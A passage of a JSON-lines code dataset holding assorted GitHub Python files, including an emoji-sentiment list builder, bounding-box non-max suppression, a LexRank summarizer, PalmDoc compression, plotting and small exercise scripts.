unicode_emojis.txt\", encoding='utf-8')\nemoji_list = unicode_emoji_list_file.read().splitlines()\nunicode_emoji_list_file.close()\naux_emojis_dict = {}\nemojis_dict = {}\nfor aux in emoji_list:\n aux_emoji = aux.split('\\t')\n emojis_dict[aux_emoji[2]] = [aux_emoji[0], aux_emoji[1], aux_emoji[3]]\nunicode_emoji_list_file.close()\ncomplementary_characters_list_file = codecs.open(path + \"list - complementary_characters.txt\", encoding='utf-8')\ncomplementary_characters_list = complementary_characters_list_file.read().splitlines()\ncomplementary_characters_list_file.close()\ncomplementary_characters_dict = {}\nfor aux in complementary_characters_list:\n aux_char = aux.split('\\t')\n complementary_characters_dict[aux_char[2]] = [aux_char[0], aux_char[1], aux_char[3]]\n\nfinal_emoji_sentiment_list_file = codecs.open(path + \"list - emojis_sentiment.csv\", encoding='utf-8', mode='a')\ncount = 0\nfor text in emoji_sentiment_list:\n spaces = text.split(\",\")\n print(spaces)\n if 'Emoji' not in spaces:\n emoji = spaces[0]\n occurrences = spaces[2]\n position = spaces[3]\n negative = spaces[4]\n neutral = spaces[5]\n positive = spaces[6]\n if emoji in emojis_dict.keys():\n emoji_type = 'Emoji'\n unicode = emojis_dict[emoji][1]\n emoji_id = emojis_dict[emoji][0]\n emoji_name = emojis_dict[emoji][2]\n else:\n if emoji in complementary_characters_dict.keys():\n emoji_type = 'Additional Character'\n unicode = complementary_characters_dict[emoji][1]\n emoji_id = complementary_characters_dict[emoji][0]\n emoji_name = complementary_characters_dict[emoji][2]\n else:\n emoji_type = 'Not identified'\n unicode = ''\n emoji_id = ''\n emoji_name = ''\n final_emoji_sentiment_list_file.write(emoji_id + \";\" + emoji + \";\" + unicode + \";\" + emoji_type\n + \";\" + occurrences + \";\" + position + \";\" + negative\n + \";\" + neutral + \";\" + positive\n + \";\" + emoji_id + \";\" + emoji_name + \"\\n\")\n count += 1\nunicode_emoji_list_file.close()\n\np_file.write(\"Total elements in new list: \" + str(count) + \"\\n\")\nexecution_time = time() - start_time\np_file.write(\"Execution time: \" + str(timedelta(seconds=execution_time)) + \"\\n\")\np_file.flush()\n","repo_name":"katherine110992/FoodDetection","sub_path":"list_generation/emoji_with_sentiment_generation.py","file_name":"emoji_with_sentiment_generation.py","file_ext":"py","file_size_in_byte":3228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12720594292","text":"# %%\nimport json\nfrom inference_schema.schema_decorators import input_schema, output_schema\nfrom inference_schema.parameter_types.standard_py_parameter_type import StandardPythonParameterType\n\n# %%\ndef init():\n print(\"This is init\")\n\n\n\n# %%\n@input_schema('data', StandardPythonParameterType('input data'))\n@output_schema(StandardPythonParameterType('test is inputdata'))\ndef run(data):\n test = json.loads(data)\n print(f\"received data {test}\")\n return f\"test is {test}\"\n\n\n# %%\nfrom inference_schema import schema_util\n\n# %%\nschema_util.get_input_schema(run)\n# %%\nschema_util.get_output_schema(run)\n# %%\nschema_util.get_schemas_dict()\n# %%\nschema_util.is_schema_decorated(run)\n# %%\n","repo_name":"mutazag/misc","sub_path":"py_inference_schema/entry_script.py","file_name":"entry_script.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41654863670","text":"#!/usr/bin/env python3\n\"\"\"\nProject title: CollembolAI\nAuthors: Stephan Weißbach, Stanislav Sys, Clément Schneider\nOriginal repository: https://github.com/stasys-hub/Collembola_AI.git\nModule title: nms\n.py\nPurpose: supresses overlapping bounding boxes that are overlapping more\n then the specified IoU threshold\nDependencies: See ReadMe\nLast Update: 18.02.2022\n\"\"\"\n\nimport pandas as pd\nfrom itertools import combinations\n\n\ndef non_max_supression(df_pred, IoU_threshold=0.7, area=1000000):\n \"\"\"Identify overlapping annotations boxes in a dataframe created from a coco instance, identify and remove duplicates based\n on IoU threshold. If class agnostic is true, only overlapping boxes from the same label will be removed.\"\"\"\n nms_df = pd.DataFrame()\n for image_id in df_pred.image_id.unique():\n # get a dataframe with predictions of certain image\n sdf_pred = df_pred[df_pred[\"image_id\"] == image_id].copy()\n sdf_pred[\"id_temp\"] = sdf_pred[\"id\"]\n # create a dataframe having all possible combinations between predicted bounding boxes\n df = pd.DataFrame(combinations(sdf_pred[\"id\"], 2), columns=[\"id_x\", \"id_y\"])\n # add informations to new dataframe\n df = df.merge(\n sdf_pred[[\"id_temp\", \"box\", \"score\", \"name\"]],\n how=\"left\",\n left_on=\"id_x\",\n right_on=\"id_temp\",\n ).merge(\n sdf_pred[[\"id_temp\", \"box\", \"score\", \"name\"]],\n how=\"left\",\n left_on=\"id_y\",\n right_on=\"id_temp\",\n )\n if df.shape[0] == 0:\n continue\n # compute intersection, union and IoU between predicted bounding boxes\n df[\"intersection\"] = df[[\"box_x\", \"box_y\"]].apply(\n lambda x: x[0].intersection(x[1]).area, axis=1\n )\n df[\"union\"] = df[[\"box_x\", \"box_y\"]].apply(\n lambda x: x[0].union(x[1]).area, axis=1\n )\n df[\"IoU\"] = df[\"intersection\"] / df[\"union\"]\n df = df[df[\"IoU\"] > IoU_threshold]\n df['drop'] = df['id_y'].where(df['score_x'] > df['score_y'], df['id_x'])\n sdf_pred = sdf_pred[~(sdf_pred['id'].isin(df['drop']))] \n sdf_pred.drop(labels=['id_temp'], axis=1, inplace=True)\n nms_df = pd.concat([nms_df, sdf_pred], axis=0)\n nms_df = nms_df[nms_df[\"area\"] < area]\n return nms_df\n","repo_name":"stasys-hub/Collembola_AI","sub_path":"src/postprocess/nms.py","file_name":"nms.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"10616217972","text":"import tensorflow as tf\nimport os\nimport cv2\nimport numpy as np\nimport glob\n\nROOT_DIR = os.getcwd()\nDATA_DIR = ROOT_DIR + '/data'\nRESOURCE_DIR = ROOT_DIR + '/images'\nMODEL_DIR = ROOT_DIR + '/model'\n\n# All classes for categorization\nclasses = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat', 'Sandal',\n 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']\n\nsess = tf.Session()\n\n# Load and restore the trained model\nsaver = tf.train.import_meta_graph('model/model.ckpt.meta')\nsaver.restore(sess, tf.train.latest_checkpoint('model'))\n\ngraph = tf.get_default_graph()\n\n# Get the tensors which we will be needed\n# for the prediction. The names must be \n# assigned during the training.\nx = graph.get_tensor_by_name('x:0')\ny = graph.get_tensor_by_name('y:0')\n\nimg_size = 28\n\npath = os.path.join('images', 'test', '*g')\nfiles = glob.glob(path)\nfor img_file in files:\n print('working on ', img_file)\n \n # Load the image in grayscale\n test_im = cv2.imread(img_file, cv2.IMREAD_GRAYSCALE)\n \n # Or convert an already loaded color image to grayscale\n # test_im = cv2.cvtColor(test_im, cv2.COLOR_BGR2GRAY)\n \n # Resize an image\n # test_im = cv2.resize(test_im, (img_size, img_size))\n \n # resize image and invert grayscale\n test_im = 255 - cv2.resize(test_im, (img_size, img_size), cv2.INTER_LINEAR)\n \n # If needed, see the loaded, resized and inverted image\n # from jupyter notebook\n # plt.imshow(test_im, cmap=plt.get_cmap('Greys_r'))\n # plt.show()\n \n # Reshape the image when using color images\n # test_im = test_im.reshape(1, img_size, img_size, num_channels)\n \n # Flatten the image and then reshape it to convert the \n # matrix image (28x28) into a vector of size (1, 784)\n test_im = test_im.flatten().reshape(1, 784)\n \n # If needed, see the image (from python script)\n # cv2.imshow('image', test_im)\n # cv2.waitKey(0)\n # cv2.destroyAllWindows()\n\n # THIS GETS OUR LABEL AS A INTEGER\n # label = classes[y_train.argmax()]\n \n # Lets get the prediction as integer which will be the \n # key in the classes list above\n prediction = sess.run(y, feed_dict={x: test_im}).argmax()\n\n print(classes[prediction])\n \n # When needed, check the prediction output with image\n # plt.title('Prediction: %d Label: %s' % (prediction, classes[prediction]))\n # plt.imshow(test_im.reshape([28,28]), cmap=plt.get_cmap('Greys_r'))\n # plt.show()\n","repo_name":"moshfiqur/wicked-wench","sub_path":"fashion-mnist/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":2438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6014970284","text":"from collections import defaultdict\nfrom os import walk\nfrom math import sqrt\n\n\ndef idf_modified_cosine(x, y, idf):\n \"\"\"\n Computes the idf modified cosine of two sentences, using the idf values from training\n :param x: sentence x\n :type x: str\n :param y: sentence y\n :type y: str\n :param idf: inverse document frequency of words seen in training\n :type idf: defaultdict\n :return: idf-modified-cosine value of both sentences (similarity between them)\n :rtype: float\n \"\"\"\n x_words = x.split()\n y_words = y.split()\n words = x_words + y_words\n # Pw∈x,y tfw,xtfw,y(idfw)^2\n numerator = 0\n for word in words:\n numerator += x_words.count(word) * y_words.count(word) * (idf[word]**2)\n # √(Pxi∈x(tfxi,xidfxi)^2) × √(Pyi∈y(tfyi,yidfyi)^2)\n denominator_x = 0\n for word in x_words:\n denominator_x += (x_words.count(word) * idf[word])**2\n denominator_y = 0\n for word in y_words:\n denominator_y += (y_words.count(word) * idf[word])**2\n denominator = sqrt(denominator_x) * sqrt(denominator_y)\n return numerator/denominator\n\n\ndef power_method(cosine_matrix, matrix_size, error_tolerance):\n \"\"\"\n Compute the stationary distribution of a Markov chain\n :param cosine_matrix: Cosine Matrix from lexrank\n :type cosine_matrix: dict\n :param matrix_size: Size of the matrix(sentence)\n :type matrix_size: int\n :param error_tolerance: Error tolerance (threshold over which to filter out edges)\n :type error_tolerance: float\n :return: Stationary distribution of a Markov chain (e.g. cosine matrix)\n :rtype: dict\n \"\"\"\n p0 = 1/matrix_size\n t = 0 # p_t-1\n p = {}\n\n for x, y in cosine_matrix.keys(): # Initialize dictionary p\n p[x] = p0\n\n while True:\n pt = {}\n for x, y in cosine_matrix.keys():\n pt[x] = cosine_matrix[(x, y)] * p[x]\n result = 0\n for x in pt.keys():\n result += (pt[x] - p[x]) ** 2\n p = pt\n if result < error_tolerance:\n break\n return p\n\n\ndef lexrank(sentences, cosine_threshold, idf, error_tolerance):\n \"\"\"\n Computes lexrank scores for a given article (list of sentences)\n :param sentences: An array S of n sentences\n :type sentences: list of list\n :param cosine_threshold: cosine threshold for LexRank algorithm\n (reduce number of edges, non-significant sentence similarities)\n :type cosine_threshold: float\n :param idf: inverse document frequency values for words seen in training\n :type idf: defaultdict\n :param error_tolerance: makers Markov Chain robust for errors (https://goo.gl/VFhiqv) e.g. 0.00001\n :type error_tolerance: float\n :return A dictionary of L of LexRank scores.\n :rtype: dict\n \"\"\"\n n = len(sentences)\n cosine_matrix = {} # size n*n\n degree = {} # size n\n l = {} # size n\n\n for i in range(n): # for i <- 1 to n do...\n for j in range(n): # for j <- 1 to n do...\n cosine_tuple = (i, j)\n cosine_matrix[cosine_tuple] = idf_modified_cosine(sentences[i], sentences[j], idf)\n if cosine_matrix[cosine_tuple] > cosine_threshold:\n cosine_matrix[cosine_tuple] = 1\n degree[i] = 1 if i not in degree else degree[i]+1\n else:\n cosine_matrix[cosine_tuple] = 0\n # end\n for i in range(n): # for i <- 1 to n do...\n for j in range(n): # for j <- 1 to n do...\n cosine_tuple = (i, j)\n cosine_matrix[cosine_tuple] = cosine_matrix[cosine_tuple]/degree[i] # might need to handle degree[i]\n # end\n l = power_method(cosine_matrix, n, error_tolerance)\n return l\n\n\ndef summarizer(filename, cosine_threshold, idf, error_tolerance):\n \"\"\"\n Summarizes a text file using LexRank algorithm\n :param filename: File to summarize\n :type filename: str\n :param cosine_threshold: cosine threshold for LexRank algorithm\n (reduce number of edges, non-significant sentence similarities)\n :type cosine_threshold:\n :param idf: dictionary containing inverse document frequencies of words seen in training\n :type idf: dict\n :param error_tolerance: makers Markov Chain robust for errors (https://goo.gl/VFhiqv) e.g. 0.00001\n :type error_tolerance: float\n :return: summary of file passed in @filename\n :rtype: str\n \"\"\"\n sentences, sentences_rank = extract_text(filename)\n scores = lexrank(sentences, cosine_threshold, idf, error_tolerance)\n # consider using arbitrary summary length cutoff instead of filtering out non-zeroes\n sorted_scores = {k: v for k, v in scores.items() if v != 0}\n sorted_scores = sorted(sorted_scores.items(), key=lambda x: x[1], reverse=True)\n summary = ''\n for k, v in sorted_scores:\n summary += sentences[k] + '\\n'\n return summary\n\n\ndef load_file(filename):\n \"\"\"\n Extracts words and their respective inverse document frequencies from file created in training section.\n :param filename: name of file made in training\n :type filename: str\n :return: dictionary of words with their respective idf values {word:idf}\n :rtype: defaultdict\n \"\"\"\n words_idf = defaultdict(float)\n with open(filename, 'r') as infile:\n for line in infile:\n word, count, idf = line.split()\n words_idf[word] = float(idf)\n return words_idf\n\n\ndef extract_text(filename):\n \"\"\"\n This function processes articles from the CNN dataset, extracts all the sentences in a list\n along with a dictionary that maps the sentences with their respective sentence labels.\n :param filename: File with text to summarize\n :type filename: str\n :return: list of sentences and a dictionary that maps each sentence with their respective sentence label\n :rtype: list, list of tup\n \"\"\"\n text = ''\n # read article\n with open(filename, 'r') as infile:\n text = ''.join(infile.readlines())\n # split sections\n text_tokens = text.split('\\n\\n')\n url = sentences = highlights = maps = ''\n if len(text_tokens) == 4:\n url, sentences, highlights, maps = text_tokens\n else:\n # some entities have extra '\\n\\n' between them\n url = text_tokens[0]\n sentences = text_tokens[1]\n highlights = text_tokens[2]\n for i in range(3, len(text_tokens)):\n maps += text_tokens[i] + '\\n'\n else:\n maps = maps[:-1]\n # entities\n entities = {mapping.split(':')[0]: mapping.split(':')[1] for mapping in maps.split('\\n')}\n # sentences\n entity_tag = '@entity'\n while entity_tag in sentences:\n start_index = sentences.find(entity_tag)\n end_index = start_index + len(entity_tag)\n while sentences[end_index+1].isdigit():\n end_index += 1\n entity = sentences[start_index:end_index+1]\n sentences = sentences.replace(entity, entities[entity])\n # separate sentences from 'sentence label'\n sentences_rank = {token.split('\\t\\t\\t')[0]: token.split('\\t\\t\\t')[1]\n for token in (sentence for sentence in sentences.split('\\n'))}\n sentences = [sentence for (sentence, rank) in sentences_rank.items()]\n return sentences, sentences_rank\n\n\ndef word_counter(path):\n \"\"\"\n Iterates through all files in path to obtain the inverse document frequency (idf) values for each word\n :param path: path from which to obtain summary files\n :type path: str\n :return: dictionary containing the counts of how many documents a word was seen\n in along with the total number of documents\n :rtype: tup (dict, int)\n \"\"\"\n single_document_word_counts = {}\n multiple_document_word_count = defaultdict(float)\n number_of_documents = 0\n for (dirpath, dirnames, filenames) in walk(path):\n for filename in filenames:\n if filename.endswith('.summary'):\n continue\n # read text\n sentences, sentences_rank = extract_text(path + filename)\n sentences = ' '.join(sentences)\n # account for having seen each word once in the current document\n for word in sentences.split():\n if word not in single_document_word_counts:\n single_document_word_counts[word] = 1\n # add one count for having seen each of the words in yet another document\n for key in single_document_word_counts.keys():\n multiple_document_word_count[key] += 1\n single_document_word_counts = {}\n number_of_documents += 1\n return dict(multiple_document_word_count), number_of_documents\n","repo_name":"esamudio/extractive-summarizer","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34431630023","text":"#!/usr/bin/python\n\n__autor__= \"posixroot\"\n\nimport sys\nimport os\nimport random\nimport math\nimport numpy as np\n\n\ndef compute_parameters(cluster_names, vector_length, training_data):\n \"\"\"This function computes the EM algorithm.\"\"\"\n\n # print \"AI HW1\\n\"\n #\n # if len(argv) != 4:\n # print \"Usage: python guassmix.py <#clusters> \"\n # sys.exit()\n #\n # os.path.dirname(os.path.abspath(__file__))\n # clusters = int(argv[1])\n # data = argv[2] #'wine.train'\n # model = argv[3] #'wineout'\n #\n # random.seed(clusters*random.random())\n\n # f = open(data, 'r')\n\n mu = {}\n variance = {}\n clusters = len(cluster_names)\n\n sorted_data = {}\n for item in training_data:\n label = item.keys()[0]\n if sorted_data.has_key(label):\n sorted_data[label].append(item.get(label))\n else:\n sorted_data[label] = []\n sorted_data[label].append(item.get(label))\n\n for label in sorted_data.keys():\n mat2d = np.array(sorted_data[label])\n mu[label] = list(np.mean(mat2d, axis=0))\n variance[label] = list(np.var(mat2d, axis=0))\n \n return mu, variance\n\n\n\n'''\n for item in training_data:\n item\n\n\n testdata = []\n\n testrows, testfeatures = f.readline().split()\n testrows = int(testrows)\n testfeatures = int(testfeatures)\n\n for line in f:\n testdata.append([float(x) for x in line.split()])\n\n #################print testdata[12]\n\n #Initialize prior values for all the clusters\n prior = []\n for i in range(clusters):\n prior.append(1/float(clusters))\n\n ############print '\\nprior check: '\n ############print prior\n\n #Find the min, max and range of each of the features\n maxarr = []\n minarr = []\n for i in range(testfeatures):\n temp = []\n for j in range(testrows):\n temp.append(testdata[j][i])\n maxarr.append(max(temp))\n minarr.append(min(temp))\n\n rangearr = [abs(a-b) for a,b in zip(maxarr, minarr)]\n\n #Initialize mu for all clusters. Method 1 (random datapoints as means)\n mu = []\n for i in range(clusters):\n mu.append(random.choice(testdata))\n\n #Method 2 to Initialize the mean(uniform dist. over range). To enable, uncomment the below lines.\n #mu = []\n #for i in range(clusters):\n #mu.append([a+(b*i/clusters) for a,b in zip(minarr,rangearr)])\n\n #mu.append(testdata[1])\n #mu.append(testdata[60])\n #mu.append(testdata[140])\n\n\n #Initialize Standard Deviation values for all the clusters\n sd = []\n for i in range(clusters):\n frac = random.random()\n sd.append([a*frac for a in rangearr])\n\n ########print \"sd values:\"\n ########for i in range(clusters):\n ########print 'sd[0] is ', sd[i]\n ########print '\\n'\n\n loopvar = 1\n #Iteration 1\n while(loopvar>0):\n logprior = []\n for i in range(clusters):\n #ell.append(testdata)\n logprior.append(math.log(prior[i]))\n\n ############print 'logprior: ', logprior\n\n ell = []\n for i in range(clusters):\n temp = []\n for j in range(testrows):\n temp.append([(-1)*((a-b)**2)/(2*c*c) for a,b,c in zip(testdata[j],mu[i],sd[i])])\n ell.append(temp)\n\n temp2 = []\n for i in range(clusters):\n temp = []\n for j in range(testrows):\n temp.append([a+(-0.5*math.log(2*math.pi*b)) for a,b in zip(ell[i][j],sd[i])])\n temp2.append(temp)\n ell = []\n ell = temp2[:]\n\n temp2 = []\n for i in range(clusters):\n temp = []\n for j in range(testrows):\n sumx = 0.0\n for k in range(testfeatures):\n sumx += ell[i][j][k]\n temp.append(sumx)\n temp2.append(temp)\n ell = []\n ell = temp2[:]\n\n #print '\\n\\nEll\\n',loopvar\n #for i in range(clusters):\n #print ell[i][0]\n\n #loop break condition\n if(loopvar>1):\n ellmat = numpy.array(ell)\n oldellmat = numpy.array(oldell)\n\n loopbreaker = 1\n for i in range(clusters):\n for j in range(testrows):\n ellmat[i,j] = math.fabs((ellmat[i,j] - oldellmat[i,j])/oldellmat[i,j])\n if(ellmat[i,j]>=0.001):\n loopbreaker = 0\n if(loopbreaker == 0):\n break\n\n if(loopbreaker==1):\n break\n\n ellprior = []\n for i in range(clusters):\n ellprior.append([logprior[i]+x for x in ell[i]])\n\n ########print '\\n\\nElls are: '\n ########for i in range(clusters):\n ########print ell[i][12]\n\n ########print '\\n\\nEllpriors are: '\n ########for i in range(clusters):\n ########print ellprior[i][12]\n\n lsxmax = []\n for i in range(testrows):\n temp = []\n for j in range(clusters):\n temp.append(ellprior[j][i])\n lsxmax.append(max(temp))\n\n ########print 'lsxmax is: ', lsxmax[12]\n\n\n temp = []\n for i in range(clusters):\n temp.append([a-b for a,b in zip(ellprior[i],lsxmax)])\n ellprior = []\n ellprior = temp[:]\n\n epost = []\n #for i in range(clusters):\n #epost.append(ellprior[i])\n epost = ellprior[:]\n\n\n #print '\\n'\n #for i in range(clusters):\n #print 'epost[0][12] is: ', epost[i][12]\n\n\n\n ############print '\\nELLPRIOR CHECK (with lsxmax subtracted): '\n ############for i in range(clusters):\n ############print ellprior[i][12]\n\n temp = []\n for i in range(clusters):\n temp.append([math.exp(a) for a in ellprior[i]])\n ellprior = []\n ellprior = temp[:]\n\n ############print '\\nELLPRIOR CHECK (E power): '\n ############for i in range(clusters):\n ############print ellprior[i][12]\n\n sumarr = []\n for i in range(testrows):\n sumrow = 0.0\n for j in range(clusters):\n sumrow += ellprior[j][i]\n sumarr.append((-1)*math.log(sumrow))\n\n #print '\\nThe sumarr test: '\n #print sumarr[12]\n\n temp = []\n for i in range(clusters):\n temp.append([a+b for a,b in zip(epost[i],sumarr)])\n epost = []\n epost = temp[:]\n\n ############print '\\n The posterior check: '\n ############for i in range(clusters):\n ############print epost[i][12]\n\n temp = []\n for i in range(clusters):\n temp.append([math.exp(a) for a in epost[i]])\n epost = []\n epost = temp[:]\n\n ############print '\\n The posterior check (normal space): '\n ############for i in range(clusters):\n ############print epost[i][12]\n\n ##End of E step\n\n #M Step\n priorval = []\n for i in range(clusters):\n sumcol = 0.0\n for j in range(testrows):\n sumcol += epost[i][j]\n #smoothening incorporated so that prior is never 0\n priorval.append((sumcol+0.00001)/testrows)\n\n ############print '\\n PriorVal check: '\n ############for i in range(clusters):\n ############print priorval[i]\n\n muval = []\n for i in range(clusters):\n temp = []\n for j in range(testfeatures):\n sumval = 0.0\n for k in range(testrows):\n sumval += (testdata[k][j]*epost[i][k])\n temp.append(sumval)\n muval.append(temp)\n\n ############print '\\n Muval check (before division): '\n ############for i in range(clusters):\n ############print muval[i]\n\n temp = []\n for i in range(clusters):\n temp.append([a/(priorval[i]*testrows) for a in muval[i]])\n muval = temp[:]\n\n ############print '\\n Muval check (after div): '\n ############for i in range(clusters):\n ############print muval[i]\n\n sdval = []\n for i in range(clusters):\n temp = []\n for j in range(testfeatures):\n sumval = 0.0\n for k in range(testrows):\n sumval += (((testdata[k][j]-muval[i][j])**2)*epost[i][k])\n temp.append(sumval)\n sdval.append(temp)\n\n ############print '\\n sdval check (before division): '\n ############for i in range(clusters):\n ############print sdval[i]\n\n temp = []\n for i in range(clusters):\n #smoothening incorporated so that sd can never be 0\n temp.append([math.sqrt((a+0.00001)/(priorval[i]*testrows)) for a in sdval[i]])\n sdval = []\n sdval = temp[:]\n\n ############print '\\n sdval check (after division): '\n ############for i in range(clusters):\n ############print sdval[i]\n\n oldell = ell[:]\n prior = priorval[:]\n mu = muval[:]\n sd = sdval[:]\n\n loopvar +=1\n\n print \"\\nThreshold met. Loop Exited!\\n\\nFor Reference: \"\n print \"\\nPrior val: \", prior\n print \"\\nMu val: \", mu\n print \"\\nSD val: \", sd\n for i in range(clusters):\n print \"\\nOLDELL row vals: \", oldell[i]\n\n print '\\n\\nNumber of loops: ', loopvar\n\n outf = open(model, 'w')\n outf.write(str(clusters)+' '+str(testfeatures)+'\\n')\n for i in range(clusters):\n outf.write(str(prior[i])+' ')\n for j in range(testfeatures):\n outf.write(str(mu[i][j])+' ')\n for j in range(testfeatures):\n outf.write(str(sd[i][j])+' ')\n outf.write('\\n')\n\n outf.close()\n\n\n\nif __name__ == '__main__':\n guassmix(sys.argv)\n\n'''\n","repo_name":"posixroot/CodeEM","sub_path":"compute_parameters.py","file_name":"compute_parameters.py","file_ext":"py","file_size_in_byte":8666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19221813049","text":"from utils import (\n get_data,\n get_season,\n save_plot,\n default_style,\n add_hline,\n SEASON_COLORS,\n COLUMN_NAMES,\n)\nfrom plotly import express as px\nfrom plotly.graph_objects import Figure\n\nfrom functools import reduce\n\n\ndef make_plot(\n time_granularity: str = \"Month\",\n time_group: bool = False,\n dashboard: bool = False,\n testing: bool = False,\n) -> Figure:\n # get data\n df = (\n get_data(\n \"fnl_sleep__obt\", (\"sleep_year\", \"sleep_month\", \"corrected_hours\"), testing\n )\n .rename(columns=COLUMN_NAMES)\n .rename(columns={\"Real sleep hours\": \"Duration\"})\n )\n\n # get colums to group with\n if time_granularity == \"Month\":\n if time_group is False:\n group_cols = [\"Year\", \"Month\"]\n label = \"Date\"\n else:\n group_cols = label = \"Month\"\n else:\n group_cols = label = \"Year\"\n\n # group and clean data\n df = df.groupby(group_cols).mean().reset_index()\n if label == \"Date\":\n df[label] = reduce(lambda a, b: df[a] + \"-\" + df[b], group_cols)\n if time_granularity == \"Month\":\n df[\"Season\"] = get_season(df[\"Month\"])\n avg = df[\"Duration\"].mean()\n\n # make plot\n fig = px.bar(\n df,\n x=label,\n y=\"Duration\",\n color=\"Season\" if time_granularity == \"Month\" else \"Duration\",\n color_continuous_scale=px.colors.sequential.Aggrnyl_r,\n color_discrete_map=SEASON_COLORS,\n )\n\n add_hline(fig, avg, dashboard)\n default_style(fig, dashboard)\n\n if dashboard is False:\n save_plot(fig, f\"duration_by_{label.lower()}\", testing)\n\n return fig\n\n\ndef main():\n fig = make_plot()\n\n fig.show()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"EloiSanchez/sleep_android_viz","sub_path":"plots/sleep_duration.py","file_name":"sleep_duration.py","file_ext":"py","file_size_in_byte":1740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18176005750","text":"# %% [markdown]\n# Đọc File\n\n# %%\ninput = \"\"\n\nwith open('size.inp', 'r') as fi:\n input = fi.read()\n\n# %% [markdown]\n# Tách data thành các cặp chiều cao và cân nặng\n\n# %%\nheight_and_weight_list = input.split(\"\\n\")\nprint(height_and_weight_list)\n\n# %% [markdown]\n# Tạo File size.out\n\n# %%\nfile_out = open(\"size.out\", \"x\")\n\n# %% [markdown]\n# Kiểm tra điều kiện và viết kết quả vào file\n\n# %%\nfor height_and_weight in height_and_weight_list:\n [height, weight] = height_and_weight.split(\" \")\n height = float(height)\n weight = int(weight)\n if (1.6 <= height <= 1.65) & (55 <= weight <= 60):\n file_out.write(\"S\\n\")\n elif (1.66 <= height <= 1.69) & (60 <= weight <= 65):\n file_out.write(\"M\\n\")\n elif (1.70 <= height <= 1.74) & (66 <= weight <= 70):\n file_out.write(\"L\\n\")\n elif (1.75 <= height <= 1.76) & (70 <= weight <= 76):\n file_out.write(\"XL\\n\")\n elif (1.75 <= height <= 1.77) & (76 <= weight <= 80):\n file_out.write(\"XXL\\n\")\n else:\n file_out.write(\"NO\\n\")\n\n\n# %% [markdown]\n# Đóng File\n\n# %%\nfile_out.close()\n","repo_name":"Datngo2001/ThiThu","sub_path":"size.py","file_name":"size.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72916611666","text":"import io\nimport sys\nfrom struct import pack\n\n\ndef decompress_doc(data):\n uncompressed = b''\n skip_next = 0\n\n for idx, item in enumerate(data):\n if skip_next:\n skip_next -= 1\n continue\n\n if item in range(1, 9):\n # copy amount of bytes as in item\n skip_next = item\n for amount in range(1, item + 1):\n uncompressed += data[idx + amount].to_bytes(1, sys.byteorder)\n\n elif item < 128:\n # direct ascii copy\n uncompressed += item.to_bytes(1, sys.byteorder)\n\n elif item >= 192:\n # merged space and ascii character\n uncompressed += b' ' + (item ^ 128).to_bytes(1, sys.byteorder)\n\n else:\n # compressed data, item contains how many characters should be\n # repeated for the next one.\n skip_next = 1\n item = (item << 8) + data[idx + 1]\n character_index = (item & 0x3FFF) >> 3\n for _ in range((item & 7) + 3):\n uncompressed += (uncompressed[len(uncompressed) -\n character_index]\n .to_bytes(1, sys.byteorder))\n\n return uncompressed\n\n\ndef compress_doc(data):\n out = io.BytesIO()\n i = 0\n ldata = len(data)\n while i < ldata:\n if i > 10 and (ldata - i) > 10:\n chunk = b''\n match = -1\n for j in range(10, 2, -1):\n chunk = data[i:i+j]\n try:\n match = data.rindex(chunk, 0, i)\n except ValueError:\n continue\n if (i - match) <= 2047:\n break\n match = -1\n if match >= 0:\n n = len(chunk)\n m = i - match\n code = 0x8000 + ((m << 3) & 0x3ff8) + (n - 3)\n out.write(pack('>H', code))\n i += n\n continue\n ch = data[i:i+1]\n och = ord(ch)\n i += 1\n if ch == b' ' and (i + 1) < ldata:\n onch = ord(data[i:i+1])\n if onch >= 0x40 and onch < 0x80:\n out.write(pack('>B', onch ^ 0x80))\n i += 1\n continue\n if och == 0 or (och > 8 and och < 0x80):\n out.write(ch)\n else:\n j = i\n binseq = [ch]\n while j < ldata and len(binseq) < 8:\n ch = data[j:j+1]\n och = ord(ch)\n if och == 0 or (och > 8 and och < 0x80):\n break\n binseq.append(ch)\n j += 1\n out.write(pack('>B', len(binseq)))\n out.write(b''.join(binseq))\n i += len(binseq) - 1\n return out.getvalue()\n","repo_name":"gryf/ebook-converter","sub_path":"ebook_converter/ebooks/compression/palmdoc.py","file_name":"palmdoc.py","file_ext":"py","file_size_in_byte":2790,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"48"} +{"seq_id":"19065803807","text":"#!/usr/bin/env python3\n\nbill = float(input(\"Total bill amount? \"))\nservice = input(\"Level of service? \")\nservice = service.lower()\nsplit = float(input(\"Split how many ways? \"))\n\nif service == 'good':\n tip_percent =.2\n \nelif service == 'fair':\n tip_percent = .15\n \nelif service == 'bad':\n tip_percent = .1\nelse:\n exit = 1\n print(\"Sorry try again!\")\n \nif exit != 1: \n tip = float(bill*tip_percent)\n total = float(bill+tip)\n perperson = float(total/split)\n print(\"Tip amount: {}\".format(tip))\n print(\"Total amount: {}\".format(total))\n print(\"Amount per person: {}\".format(perperson))","repo_name":"iuriarte/python-exercises-iu","sub_path":"week_1/tip_calc2.py","file_name":"tip_calc2.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24403931413","text":"class Node:\n\tdef 